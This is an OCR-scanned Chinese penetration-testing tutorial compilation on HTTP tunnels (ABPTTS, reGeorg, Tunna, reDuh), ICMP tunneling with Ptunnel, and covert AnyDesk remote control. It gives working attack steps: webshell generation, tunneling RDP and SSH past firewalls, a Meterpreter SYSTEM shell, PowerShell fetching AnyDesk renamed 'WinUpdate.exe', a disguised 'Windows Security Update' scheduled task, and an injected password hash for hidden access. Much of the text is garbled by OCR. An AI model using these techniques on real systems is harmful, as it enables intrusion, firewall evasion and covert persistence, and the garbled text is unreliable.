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ICMP C2 
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HTTP 隧 道 ABPTTS 第 一 季 


HTTP 隧 道 abptts 第 一 季 


ABPTTS 简 介 : 


ABPTTS 是 NCC Group 在 2016 年 blackhat 推 出 的 一 款 将 TCP 流 量 通过 HTTP/HTTPS 进 行 流量 转发 ， 
在 目前 云 主 机 的 大 环境 中 ， 发 挥 了 比较 重要 的 作用 ， 可 以 通过 脚本 进行 RDPSSH,Meterpreter 的 交 
互 与 连接 。 也 意味 着 这 样 可 以 建立 一 个 通过 80 端 口 得 流量 出 站 来 逃避 防火 墙 。 与 其 它 http 隧 道 不 同 
的 是 ，abptts 是 全 加 密 。 


2016 年 blackhat 介 绍 : 
Github: https://github.com/nccgroup/ABPTTS 


安装 与 生成 payload: 


root@John:~# git clone https://github.com/nccgroup/ABPTTS. git 
Cloning into 'ABPTTS'... 


remote: Enumerating objects: 50, done. 
remote: Total 50 (delta 0), reused © (delta 0), pack-reused 50 
Unpacking objects: 100% (50/50), done. 
root@John:~# pip install pycrypto 
Requirement already satisfied: pycrypto in /usr/lib/python2.7/dist-packages (2.€ 
root@John:~# cd ABPTTS/ 
root@John:~/ABPTTS# ls 
abpttsclient.py abpttsfactory.py ABPTTS-Manual.pdf data  libabptts.py licens 


root@John:~/ABPTTS# python abpttsfactory.py -o webshell 
131919] ------[[[ A Black Path Toward The Sun ]]]===--- 


[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 


08: 
:24 
:24: 
:24 
24: 
24: 
24: 
24: 
24: 
24; 
24: 
24: 
24: 
24: 


08 
08 
08 


08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 


24: 


28. 
208 
28. 
:28 
28. 
28. 
28. 
28. 
28. 
28. 
28. 
28. 
28. 
28. 


131954] 
131965] 


.131979] 


132706] 
132722] 
132739] 
136713] 
137760] 
138342] 
138492] 
138555] 
139128] 
139140] 


Factory - ]]==-- 


Ben Lincoln, NCC Group 
Version 1.0 - 2016-07-30 
Output files will be created in "/root/ABPTTS/webst 
Client-side configuration file will be written as " 
Using "/root/ABPTTS/data/american-english-lowercase 
configuration file "/root/ABPTTS/wek 


Created client 
Created server 
Created server 
Created server 
Created server 


file 
file 
file 
file 


"/root/ABPTTS/webshell/abptts.j 
"/root/ABPTTS/webshell/abptts.e 
"/root/ABPTTS/webshell/war/WEB- 
"/root/ABPTTS/webshell/war/MET^ 


Prebuilt JSP WAR file: /root/ABPTTS/webshell/scabGr 
Unpacked WAR file contents: /root/ABPTTS/webshell/w 
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4# git clone http ithub.com/nccgroup/ABPTTS. git 
Cloning into 'ABPTTS' 


remate: Enumerating object done. 
remote: To 50 ta 0), pack-reused 50 
Unpacking abject 

Requirement already sati 


lib/python2. 7/dist-packages 6.1} 
rootaJohn/-# cd ABPTTS 


data libabptts.py license.txt README.md settings overlays. template 


The Sun 11] 
H z 
Ben Lincoln, 
Ve on 1,0 - 
Output files will be cr 


shell/config.txt" 
dlist file 


NEB-INF/web.xml" 
E /MANIFE 

cabGroup. war 

ell Avar 





以 aspx 为 demo。 


< 人 D 192. 168. 1.119 
Xt 


攻击 机 执行 
xk: 如 果 攻 击 机 为 vps， 则 -t 需要 填写 vps_ip:port/ 目 标 机 :port 


python abpttsclient.py -c webshell/config.txt -u "http://192.168.1.119/abptts.as 
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root@John:~/ABPTTS# python abpttsclient.py -c webshell/config.txt -u "http://192 


[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 
[2019-01-28 


08 
08 


08: 
08: 
08: 


08 
08 
08 


08: 
08: 
08: 
08: 


08 


08: 
08: 
08: 


08 


08: 
08: 
08: 
08: 
08: 


08 


08: 
08: 
08: 
08: 


08 


08: 
08: 


TRI 
ARE 
33; 
eC 
33: 
33: 
ASIE 
oon 
333 
33: 
33: 
393; 
"93: 
33: 
So 
33; 
99: 
33: 
33: 
331 
33: 
33: 
tag: 
33: 
SSi 
33: 
33: 
Poon 
33; 
33: 


25. 
255 
25% 
255 
29^ 


25 


749115] 
749153] 
749160] 
749169] 
750372] 


. 750392] 
28. 
28. 
28. 
28. 
28. 
29. 
29. 
29. 
29. 
29. 
36. 
36. 
36. 
36. 
36. 
45. 
45. 
48. 
48. 
54. 
54. 
54. 
54. 
54, 


560180] 
560365] 
560655] 
868187] 
868269] 
077903] 
077967] 
077987] 
078049] 
085280] 
957446] 
957601] 
957797] 
966507] 
966587] 
321612] 
321790] 
482758] 
482838] 
169354] 
169432] 
169455] 
169529] 
178078] 


---===[[[ A Black Path Toward fhe sun ]]]===--- 

ceci - Client - ]]==-- 

Ben Lincoln，NCC Group 
Version 1.0 - 2016-07-30 

Listener ready to forward connections from 192.168. 
Waiting for client connection to 192.168.1.5:33389 
Client connected to 192.168.1.5:33389 
Waiting for client connection to 192.168.1.5:33389 
Connecting to 192.168.1.119:3389 via http://192.16€ 
Server set cookie ASP.NET SessionId-boyfcepcijf43s€ 
[(S2C) 192.168.1.119:3389 -» 192.168.1.5:33389 -» 1 
Connection-level exception: [Errno 104] Connection 
Disengaging tunnel (192.168.1.3:8861 -> 192.168.1.t 
Closing client socket (192.168.1.3:8861 -» 192.168. 
Exception while closing client socket (192.168.1.3: 
Server closed connection ID CEA116F4AF1FAF8C 
Client connected to 192.168.1.5:33389 
Waiting for client connection to 192.168.1.5:33389 
to 192.168.1.119:3389 via http://192.16€ 
Set cookie ASP.NET_SessionId=bsynuc315ndo5h¢ 
192.168.1.119:3389 -> 192.168.1.5:33389 
192.168.1.3:8862 -» 192.168.1.5:33389 -> 192 
192.168.1.119:3389 -» 192.168.1.5:33389 
[(C2S) 192.168.1.3:8862 -» 192.168.1.5:33389 -> 192 
[(S2C) 192.168.1.119:3389 -» 192.168.1.5:33389 
Connection-level exception: [Errno 104] Connection 
Disengaging tunnel (192.168.1.3:8862 -> 192.168.1.* 
Closing client socket (192.168.1.3:8862 -» 192.168. 
Exception while closing client socket (192.168.1.3: 
Server closed connection ID AAOFE7F073ASEFFD 


Connecting 
Server 
[(S2C) 
[(C2S ) 
[(S2C) 


-> 1 


-> 1 


=> | 
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国 192. 168.1.5:33389 - 远程 桌面 连接 


登录 到 windows 


用 户 名 0D : [ 
密码 (P) : | 


取消 | 选项 o) >| 





非常 遗憾 的 是 ， 目 前 不 支持 PHP。 
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HTTP 隧 道 reGeorg 第 二 季 


reGeorg 简 介 : 


reGeorg 的 前 身 是 2008 年 SensePost 在 BlackHat USA 2008 的 reDuh 延 伸 与 扩展 。 也 是 目前 安全 从 
业 人 员 使 用 最 多 ， 范 围 最 广 ， 支 持 多 丰富 的 一 款 http 隧 道 。 从 本 质 上 讲 ， 可 以 将 
JSP/PHP/ASP/ASPX 等 页 面 上 传 到 目标 服务 器 ， 便 可 以 访问 该 服务 器 后 面 的 主机 。 


2014 年 blackhat 介 绍 https 
Github: https://github.com/sen 
攻击 机 : 

192.168.1.5 Debian 


192.168.1.4 Windows 7 


192.168.1.119 Windows 2003 
安装 : 
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root@John:~# git clone https://github.com/sensepost/reGeorg.git 
Cloning into 'reGeorg'... 

remote: Enumerating objects: 85, done. 

remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85 
Unpacking objects: 100% (85/85), done. 

root@John:~# cd reGeorg/ 

root@John:~/reGeorg# 1s 

LICENSE.html LICENSE.txt README.md reGeorgSocksProxy.py tunnel.ashx 
root@John:~/reGeorg# python reGeorgSocksProxy.py -h 





gh sed E y T mn A NEP c \| Wo 2] 

| VI MEE ku SN |l Share teal | 
| E | H I^ A oe NEN 

| 





.. every office needs a tool like Georg 





willemQsensepost.com / Q w m . 
sam@sensepost.com / Qtrowalts 
etienne@sensepost.com / Qkamp staaldraad 
usage: reGeorgSocksProxy.py [-h] [-1] [-p] [-r] -u [-v] 


Socks server for reGeorg HTTP(s) tunneller 


optional arguments: 


-h, --help show this help message and exit 

-l , --listen-on The default listening address 

-p , --listen-port The default listening port 

-r , --read-buff Local read buffer, max data to be sent per POST 
-u , --url The url containing the tunnel script 

-V , --verbose Verbose output[INFO|DEBUG] 


root@John:~/reGeorg# pip install urllib3 


tunnel. 


Requirement already satisfied: urllib3 in /usr/lib/python2.7/dist-packages (1.24 
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> 


;iJehn:-4 git clone. https: //qithub.com/sensepost/reGeorg.git 
Stoning into 'reGeorg'... 
remote: Enumerating objects: 
remote; Total 85 (delta O 
king objec 100% (85 
john; ~# cd. reGeorg/ 
-/reGeorgs 
LICENSE.html LICENSE.txt README:md reGeorgSocksProxy.py  tunnel.ashx tunnel.aspx 1.35. tunnel, jsp tunnel nosocket. php 
/reGearge python reGeorgSocksPr ; E 


rd 
| 


Vt 
| 
PRM, ete 


. every office needs a tool like Georg 


willemgsensepost.com / Qw m 
samgsensepost .com / gtrowalts 
etiennegsensepost .com / Gkamp_staaldraad 


usage: reGeor sPr í/d-hl [-1) f.p] 


tunneller 


max data to be sent per POST 
aining the tunnel script 
utput [INFO| DEBUG] 
t urlilib 





靶 机 执行 : 


以 aspx 为 demo。 


€- C a D 192. 168. 1. 119 
说 最 常 访问 


Georg says, 'All seems fine 


攻击 机 执行 : 


python reGeorgSocksProxy.py -p 8080 -l 192.168.1.5 -u http://192.168.1.119/tunne 
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-/reGeorgé python reGeorgSocksPraxy py =p 8080 -l 192.168.1.5 -u http 


... every office needs a tool like Georg 


willemgsensepost.com / @ w m - 
samjgsensepost.com / gtrowalts 
etiennegsensepost.com / gkamp staaldraad 


{INFO 
{INFO 
{INFO 
(INFO 


2m 
192. 168.1.5 8080 SOCKSS 添加 . 
编辑 . . 
BPR 
检查 . 


您 可 以 将 一 些 代理 服务 器 链 在 一 起 : (ieee | 


确定 | 取消 | 


ection Terminated 
[19] 
nnection 


nnection Terminated 
[19] 
nnection Terminated 


92.168.1,119/tunnel.aspx 








用 户 名 QD: [ 
Status; [FAIL] 





m 
Y. 
1s 
d 
i 
da 
d 
Li 
1. 
lu 
Pin 


sep T 


非常 遗憾 的 是 ， 目 前 大 部 分 waf 都 会 针对 默认 原装 版 本 的 reGeorg。 
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HTTP 隧 道 Tunna 第 三 季 


Tunna 简 介 : 
Tunna1.1 是 secforce 在 2014 年 11 月 出 品 的 一 款 基于 HTTP 隧 道 工 具 。 其 中 v1.1 中 支持 了 SOCKS4a。 


Tunna 演 示 稿 : 


Github : 


攻击 机 : 
192.168.1.5 Debian 


192.168.1.4 Windows 7 


ig: 


192.168.1.119 Windows 2003 
安装 : 


root@John:~# git clone https://github.com/SECFORCE/Tunna.git 
Cloning into 'Tunna'... 

remote: Enumerating objects: 6, done. 

remote: Counting objects: 100% (6/6), done. 

remote: Compressing objects: 100% (6/6), done. 

remote: Total 156 (delta 0), reused 2 (delta 0), pack-reused 150 
Receiving objects: 100% (156/156), 8.93 MiB | 25.00 KiB/s, done. 
Resolving deltas: 100% (84/84), done. 


ot@John:~# git clone https: //github.com/SECFORCE/Tunna. git 
Cloning into 'Tunna'... 
remote; Enumerating obje 





remote: Counting objects done, 

remote: Compressing objects: 1 }, done, 

remote: Total 156 (d Jon (delta 0), pack-reused 150 
Receiving objects: j), 8.93 MiB | 25.00 KiB/s, done. 
Resolving deltas: 100% (84/84), done. 

靶 机 执行 : 

以 aspx 为 demo。 
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C Q i) 192. 168. 1. 119 
E 最 常 访 问 


Tunna v1.1a 


攻击 机 执行 : 
python proxy.py -u http://192.168.1.119/conn.aspx -l 1234 -r 3389 -s -v 


‘Tunnag python proxy.py -u http: //192.168.1.119/conn. x -1 1234 -r < 


ecforce.com / nikos kis <at> secforce.com 
BSESESSOERESESESERGSESESEESSESSSESEUSSSESETESESSESESESSEESSEHEESESHSESEE 


[+] Spawning keep-alive thread 
[-] p-alive thread not required 
[+] Checking for pr : 


Received Data: 3601 (0) 
Received Data From Ping Thread: 
it data: 25580 (0) 


RP3 qu) 
密码 (p): 


890 


解决 : 
General Exception: [Errno 104] Connection reset by peer 
[+] Spawning keep-alive thread 


[-] Keep-alive thread not required 
[+] Checking for proxy: False 


连接 后 ， 出 现 


General Exception: [Errno 104] Connection reset by peer 


等 待 出 现 : 无 法 验证 此 远程 计算 机 的 身份 ， 是 否 仍 要 连接 ? 


再 次 运行 ， 在 点 击 是 (Y) 


python proxy.py -u http://192.168.1.119/conn.aspx - 1234 -r 3389 -s -v 
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Received Data: 19 (19) 

Received Data From Ping Thread: O (0) 
Sent data: 19 (0) 

Pings sent: 0 

Gene at E gapian [Errno 104] Connect 


1) 无 法 验证 此 远程 计算 机 的 身份 。 是 否 仍 要 连接 ? 

如 果 远 程 运行 的 星 Windows Vista 版 本 的 Windows: 或 者 
gettin RES eHMS ESOL MORES EHS 
请 联系 你 的 网 络 管理 员 或 远程 计算 机 的 所 有 者 以 获取 帮助 。 

[- 不 再 询问 我 是 否 连 接 到 此 计算 机 ©) 


so | Ew] 
heceiveüd.Uadra: iM ti) 
Received Data From Ping Thread: 
Sent data: 19 (0) 
Pings sent: O 
ption; [Errno 104] Connect 


远程 计算 机 运行 的 旺 Windows Vista 版 本 的 Windows， 或 者 
URIE HHSES HE MORTE IA 
for HTTP. tunneling TCP cc 


S RUE EUR ee DANT WEGE INHALT ENVIAR 
i : [ CRBHBiSHE RAIS ©) 
[+] Spawning keep-alive thread 


[-] EE alive thread not required ay) EN) 
{+} Checking for proxy: False zm | 
0 


Received Data: 3601 (0) 
Received Data From Ping Thread: 
Sent data: 25580 (0) 

Pings sent: 71 





RP: 
密码 (P): 





选项 @) >> | 





如 果 ; 没有 出 现 “ 无 法 验证 此 远程 计算 机 的 身份 ， 是 否 仍 要 连接 ? ” 
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注册 表 键 值 : HKEY CURRENT USER|SoftwareMicrosoftV Terminal Server Client\Servers 删除 对 
应 IP 键 值 即 可 。 , ho^ 


非常 遗憾 的 是 ，Tunna 对 PHP 的 支持 并 不 是 太 友好 。 
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HTTP 隧 道 reDuh 第 四 季 


reDuh 简 介 : 


reDuh 是 sensepost 由 2008-07 年 发 布 ， 从 本 质 上 讲 ， 可 以 将 JSP/PHP/ASP/ASPX 等 页 面 上 传 到 目标 
服务 器 ， 便 可 以 访问 该 服务 器 后 面 的 主机 。 


BlackHat USA 2008 介 绍 : 


Github: 


攻击 机 : 
192.168.1.5 Debian 


192.168.1.4 Windows 7 


靶 机 : 


192.168.1.119 Windows 2003 


安装 : 


root@John:~# git clone https://github.com/sensepost/reDuh.git 
Cloning into 'reDuh'... 

remote: Enumerating objects: 47, done. 

remote: Total 47 (delta 0), reused 0 (delta 0), pack-reused 47 
Unpacking objects: 100% (47/47), done. 

root@John:~# cd reDuh/ 

root@John:~/reDuh# ls 

README.markdown reDuhClient  reDuhServers 


rootiJohn:-& git clone https: //github.com/sensepost/reDuh.git 
Cloning into 'reDuh'... 
remote: Enumerating objects: 47, done. 
sed Q (delta 0), pack-reused 47 
, done, 
)hn:-$ cd re 
reGeorg/ 
otgJohn:-# cd reDuh/ 
hn:-/ 


arkdown reDuhClient  reDuhServers 





以 aspx 为 demo。 
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192. 168. 1. 119/reDuh. aspx x 


EIS 0 个 D 192. 168. 1. 119 
i£ 最 常 访问 


[reDuhError] Undefined Requerst 


攻击 机 执行 


绑 定 端口 


root@John:~/reDuh/reDuhClient/dist# java -jar reDuhClient.jar http://192.168.1.1 
[Info]Querying remote web page for usable remote service port 

[Info]Remote RPC port chosen as 42000 

[Info]Attempting to start reDuh from 192.168.1.119:80/reDuh.aspx. Using service 
[Info]reDuhClient service listener started on local port 1010 


reDuh/reDuhClient /dist# java -jar reDuhClient. jar http: //192.168,1.119/reDuh. aspx 
[Info] Querying remote web page for ble remote service port 


[Info] Attempting to start reDuh from 192.168.1.119:80/reDuh.aspx. Using s Plea 


] 
[Info]Remote RPC port chosen as 4 
] 
[Info]reDuhClient service listener started on local port 1010 





开启 新 terminal， 建 立 隧道 
命令 如 下 : 


[createTunne1][ 本 地 绑 定 端口 ] :127.9.0.1:[ 远 程 端口 ] 


root@John:~# telnet 127.0.0.1 1010 
Trying 127.0.0.1... 
Connected to 127.0.0.1. 
Escape character is '^]'. 
Welcome to the reDuh command line 
>>[createTunnel]30080:127.0.0.1:80 
Successfully bound locally to port 30080. Awaiting connections. 
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phn: -~# telnet 127.0.0.1 1010 
g 127.0.0.1. 
Connected to 127.6.0.1. 
Escape character is '^]'. 


Welcome to the reDuh command line 
»»[createTunnel]30080:127.0.0.1:80 


Successfully bound locally to port 30080. Awaiting connections. 


攻击 机 端口 前 后 对 比 : 


root@John:~# netstat -ntlp 
Active Internet connections (only servers) 


Proto Recv-Q Send-Q Local Address Foreign Address 
tcp 9 90 0.0.0.0:902 9:0.0:07* 

tcp 9 0:0707070:122 ©.0.0.0:* 

tcp6 9 ORT 902 gaa 

tcp6 0 oN Crt Du: 


root@John:~# netstat -ntlp 
Active Internet connections (only servers) 


Proto Recv-Q Send-Q Local Address Foreign Address 
tcp 0 0 0.0.0.0:902 90.0.0,9:* 

tcp 0 © 0.0.0.0:22 @.0.0.0:* 

tcp6 9 9 :::902 Re 

tcp6 9 QO pe 

tcp6 0 0 ee US 

tcp6 0 9 :::30080 RM 


rootsjohn:-# netstat -ntlp 

Active Internet connections (only servers} 

Proto Recy:9 Send-Q Local Addre Foreign Address State 
6 0.90.0 0.0,0.0:* LISTEN 
$ 0,0.0.0;* LISTEN 


" LISTEM 
(irn ros LISTEN 
~# netstat -ntlp 
Internet connections (onl 

Proto Recv-Q Send-Q ocal Addre konpran Address State 
tcp 1 LISTEN 
tcp LISTEN 
tcp6 LISTEN 
tcp6 LISTEN 
tcp6 LISTEN 
tepe LISTEN 


ooo 
ooo 
x 


© 
oo 


> 


oa 


e 


访问 攻击 机 30080 端 口 ， 既 等 价 于 访问 靶 机 80 端 口 
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State 

LISTEN 
LISTEN 
LISTEN 
LISTEN 


State 

LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 


人 name 
re-authdlau 


re-authdlau 





root@John:~# curl http://192.168.1.5:30080/ 
«html» 


«head» 
«meta HTTP-EQUIV-"Content-Type" Content="text/html; charset=gb2312"> 
«title ID=titletext>#ig#</title> 


«/head» 


«body bgcolor=white> 


~# curl http://192.168.1.5: 30080/ 
html 


shead> 
«meta HTTP-EQUIV="Content-Type” Content="text/html; charset=gb2312"> 


«title ID=titletext>SR #</title> 
</head> 


sbody bgcolor=white> 
<table> 


=Center> 
g pagerror. ttt 36 height-48» 
ablePropsWidth width=400> 


shl IDserrortype style="font: 2! Ai. verdana; color:s4e4e4e"» 
<P IDsCommentls«!--Problem--»«P ID="errorText">@ R P</hl> 


$c" ‘><font Styles"font:9pt/12pt Re: col 
要 查看 的 AMIR SARUM. 能 正在 对 记 
ep. ID=terml> 请 稍 后 再 访问 此 站 点 ae 请 与 网 站 的 管理 负 联 系 


«hr size=l colore"blue"» 
<P IDemessagel»tnA TEMNA NSRR, BU EBTIB-TUSEUEÉBE,. BHM IIS 帮助 中 的 &qu0t; 启 用 和 将 用 动态 内 容 &9qJ0t;。 


shS IDshead]>S ty fs] IIS 帮助 </h5> 

«ol» 

sli ID-bulletl»sé &y«b»7T te #85 d$ dr-b»sstr«/b». 
ullet2»1Ecb»1T3 T </b> EP. BBA <b>inetmgr</b>. 

«li IDebullet3»JA-b»:8 Bo«/b»3X 4$, S dy cb»ff ahs </b>. 

«li ID-bullet4» gy«bsInternet 信息 服务 </b>。 </ol> 





遗憾 的 是 reDuh 年 代 久 远 ， 使 用 繁琐 ， 并 官方 已 停止 维护 。 但 是 它 韵 定 了 HTTP 隧 道 。 
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Windows COM C2 
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SMB C2 
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基于 Ptunnel 建 立 ICMP 隧 道 


前 


n 


在 某 些 渗透 测试 环境 下 ， 获 得 了 一 个 主机 的 权限 但 是 该 主机 没有 访问 外 网 的 权限 ， 对 于 这 种 较 
为 严格 的 网 络 环 境 ， 第 一 时 间 想 到 的 就 是 隧道 技术 。 常 见 的 隧道 技术 有 SSH\DNSNMCMP\ 端 口 转发 
等 ， 大 多 数 端 口 都 存在 被 禁用 的 可 能 ， 但 是 ICMP 作 为 基础 服务 被 禁用 的 可 能 性 却 极 小 ， 在 常用 协议 
都 被 禁用 的 情况 下 可 以 考虑 使 用 ICMP 隧 道 。 


网 络 拓扑 





内 网 主机 10,10.10.0/24 除 了 ICMP 通 讯 不 能 主动 访问 外 网 任何 资源 ，20.20,20.101 为 hack 的 ICMP 隧 
道 服务 端 。 


准备 工作 


由 于 通过 ICMP 协 议 建立 隧道 ， 为 了 让 隧道 服务 端 能 够 处 理 收 到 的 ICMP 报 文 ， 需 要 禁用 系统 本 身 的 
ICMP 响 应 机 制 ， 这 里 先 关闭 hack 机 器 的 ICMP 响 应 机 制 


echo 1 > /proc/sys/net/ipv4/icmp echo ignore all 


Ptunnel 的 使 用 


安装 需要 的 依赖 包 并 编译 Ptunnel 
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# yum install libpcap libpcap-devel flex bison -y 
# tar xf PingTunnel-0.72.tar.gz 
# cd PingTunnel 


# make 


Ptunnel 常 用 的 参数 


。 -p 指定 跳板 机 的 IP 

。 -| 指定 转发 本 地 监听 的 端口 

。 -da 指定 最 终 要 访问 的 目标 主机 

。 -dp 指定 最 终 要 访问 目标 主机 的 端口 
PS: 跳板 机 要 有 访问 目标 主机 的 权限 ! 


在 hack 机 器 上 开启 ptunnel 隧 道 监 听 
f :~# ptunne 
arting ptunnel v 0.72. 
(c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> 
: Security features by Sebastien Raveau, <sebastien.raveau@epita. fr> 
Forwarding incoming ping packets over TCP. 
: Ping proxy is listening in privileged mode. 





在 client1 连 接 跳 板 机 20.20.20.101， 访 问 client 本 地 的 8000 端 口 ， 跳 转 到 跳板 机 本 地 的 22 端 口 


[root@localhost PingTunnel]# ./ptunnel -p 20.20.20.101 -lp 8000 -da 127.0.0.1 -dp 22 
[inf]: Starting ptunnel v 0.72. 
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> 


[inf]: Security features by Sebastien Raveau, <sebastien. raveau@epita.fr> 
[inf]: Relaying packets from incoming TCP streams. 





查看 本 地 已 经 监听 8000 端 口 
[root@localhost ~]# netstat -anp | grep 8000 
tcp 6 0 0.0.0.0:80€ 


0.0.0.0:* LISTEN 9220/./ptunnel 


[root@localhost ~]# 


client1 连 接 本 地 8000 端 口 即 可 通过 ICMP 隧 道 连接 到 跳板 机 的 22 端 口 





901 


[root@localhost ~]# ssh 127.0.0.1 -p 8000 
root@127.0.0.1's password: 


The programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 


individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 
Last BEC Mon Dec 17 21:43:36 2018 from 172.16.100.25 


~]# ssh -NfD 9050 root@i27.0.0.1 -p 8000 
201 bes pnb 


g /usr/local/lib/libproxychains4,so 
|o proxychains-ng 4.13-git-7-g49bf4ba 


Fach My WW baidu com (www baidu.com) , R 
Connecting to www.baidu.com (www.baidu.com)|224 6. 0 1|:80... {proxychains} Strict chain 
cted. 
P request sent, awaiting response... 200 OK 
h: 2381 (2.3K) [text/html] 
to: ‘index.html, 13’ 


127.0.0.1:9050 


3:13 (425 MB/s} - 'index,html.13' saved [23B1 
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www. baidu.com: 80 


in Os 





使 用 anydesk 做 远 控 


anydesk 是 类 似 team viewer 的 远程 桌面 管理 软件 ， 但 是 他 不 用 安装 ， 而 且 体积 比较 小 只 有 2.84MB 


使 用 场景 举例 
有 云 锁 ， 护 卫 神 等 禁止 3389 登 录 时 
类 似 阿里 云 这 种 ， 登 录 3389 会 报警 


连接 内 网 中 可 以 出 网 的 windows 机 器 


注意 事项 


1、 启 动 anydesk 的 权限 需要 桌面 用 户 权限 ， 比 如 ，llS 做 中 间 件 的 环境 中 ， 拿 到 了 webshell 一 般 都 
是 没有 桌面 用 户 权限 的 ， 如 果 启 动 anydesk 不 会 成 功 


2、 启 动 anydesk 时 桌面 不 能 被 注销 


3、 有 可 能 连接 上 去 是 黑屏 ， 这 个 是 因为 该 桌面 用 户 退出 远程 桌面 但 没有 注销 ， 此 时 ， 除 非 能 用 
winlogon 启 动 anydesk， 否 则 没 法 使 用 屏幕 


使 用 方法 


惯例 使 用 virustotal 扫 描 下 





ms15051 提 权 并 反弹 一 个 msf 的 shell 


Id Name Type Information 


meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-3CG99308338 192. 
168.23.137:4444 -> 192.168.23.188:49283 (192.168.23.188) 


msf exploit(h let) > sessions -i 1 
[*] Starting interaction with 1... 


Channel 1 created. 
Microsoft Windows [60;3 6.1.7609] 


66r6606 (c) 2009 Microsoft Corporationt66666060660r6000 
C:\inetpub\wwwroot>whoami 

whoami 

nt authority\system 


C:\inetpub\wwwroot>7A 





下 载 anydesk 到 一 个 公共 目录 下 


(New-Object System.Net.WebClient).DownloadFile("https://download.anydesk.com/Any 


» 


6 
66r6660 (c) 2009 METUS "Corporation666660606066c6666 


C:\inetpub\wwwroot>powershell "(New-Object System.Net.WebClient) .DownloadFile(\" 
https://download. anydesk. com/AnyDesk.exe\",\"C: \inetpub\wwwroot\winudate. exe\") 
powershell "(New-Object System.Net.WebClient).DownloadFile(M"https://download.an 
ydesk.com/AnyDesk.exe\", \"C:\inetpub\wwwroot\winudate. exe\") 





确定 有 哪些 用 户 当前 正在 使 用 桌面 


(((Get-WmiObject -Class Win32 Process -Filter 'Name="explorer.exe"').GetOwner(). 


d 


C:\inetpub\wwwroot>powershell "(((Get-WmiObject -Class Win32 Process -Filter ‘Na 
me=\"explorer.exe\"').GetOwner().User) -split ‘\n')[9] 


powershell "(((Get-WmiObject -Class Win32 Process -Filter ‘Name=\"explorer.exe\" 
').GetOwner().User) -split 'in')[9) 
jiu er 





启动 一 个 计划 任务 ， 启 动 的 用 户 为 上 个 步骤 选中 的 用 户 
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schtasks /Create /TN Windows Security Update /SC monthly /tr "C:inetpubwwwrootWi 


> 


C:\inetpub\wwwroot>schtasks /Create /TN Windows Security Update /SC monthly /tr 
"C:\inetpub\wwwroot\WinUpdate.exe" /RU jiu er 
schtasks /Create /TN Windows Security Update /SC monthly /tr "C:NinetpubNwwwroot 


\W inUpdate. exe" /RU jiu er 
: Windows Security Update 60666. 6$ 


E 0000 (Y/N) ?y 





先 执行 一 次 计划 任务 ， 生 成 配置 文件 


schtasks /run /tn Windows Security Update 


C:\inetpub\wwwroot>schtasks /run /tn Windows Security Update 
pei /run /tn Windows. Security Update 





C: \inetpub\wwroot>ff 


等 待 几 种 ， 等 anydesk 成 功 连接 到 网 络 ， 再 把 anydesk 进 程 杀 掉 ，dir 看 用 户 下 面 是 否 生成 配置 文 
件 ， 然 后 再 service.conf 里 面 的 添加 密码 (AnyDeskGetAccess) 


C:\inetpub\wwwroot>echo ad.anynet.pwd hash=85352d14ed8d515103 f6af88dd68db7573a37 
ae0f9c9d2952c3a63a8220a501c >> C:\Users\jiu_er\AppData\Roaming\AnyDesk\service.c 
onf 

echo ad.anynet.pwd_ hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9C9d2952c3a63a8 
220a501c >> C:\Users\jiu er\AppData\Roaming\AnyDesk\service. conf 


C:\inetpub\wwwroot>echo ad.anynet.pwd salt=cb65156829a1d5a7281bfe8f6c98734a >> C 
:\Users\jiu_er\AppData\Roaming\AnyDesk\service. conf 

echo ad.anynet.pwd salt-cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\jiu er\AppD 
ata\Roaming\AnyDesk\service. conf 


C:\inetpub\wwwroot>| 


€wJ 4uuvwGd\ nnRXb1QBzu+vsuh16E902d2dc7QIDAQABMAOGCSQGS I b3DQEBCWUAA4 I BAQAnUDOD\njw 
Lu7i/VfcnLdqFz7KGF5ta8Ew9SQTlLaIwOQLxoGZAstrsO1X/iD4sCuTJDVceqTh\nlOgoN+U2TUZvRj lw 
7GZPp2LcHKgvCqlowpWkr4Gia5W8KVc3lleFOahDVTUWQQLKkNntGUKVSS67h50-/ZVzpGCYlKRLVtO2W 
ue5uE4ZrMKBLSbQOGfnnWLZfsvSBeCXmjRXnSQy4427zTGj ViTDB8ku5f j PcmCAWYn90G56 j mrOaVXUAZ 
uOnclowASBdpOMk3hjBjXnwaArF7daLH/1Lu0lMYGY8nB2SdDJ6hNv 1PpHlf rGayL4eCAGBhUBB3wMBm 
u7VbCoNXnrwaKAW8ykHqWSBTBAn END CERTIFICATE 

dd -anynet.pwd hash=85352d14ed8d515103 f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a5 

c 


ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a 





查看 anydesk 的 ID 并 启动 anydesk 
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C:\inetpub\wwwrootstype C:\Users\jiu er\AppData\Roaming\AnyDesk\system. conf 

type C:\Users\jiu er\AppData\Roaming\AnyDesk\system. conf 
ad.anynet.fpr-18fc5f7337a9451624261238c854ed52a7002dab 

ad.anynet.relay.error-0.1 

ad.anynet.relay.state=0 

ad.anynet.conn addrs-4352ad59£relay-4352ad59.net.anydesk.com:80:443:6568, 128.199 


P :443:6568 

.anynet. 

;anynet.alias- —— ^ 
.anynet.network id-main 
.license.name-free-1 
.anynet.cur version-17180065792 


C:NinetpubNwwroot»li 


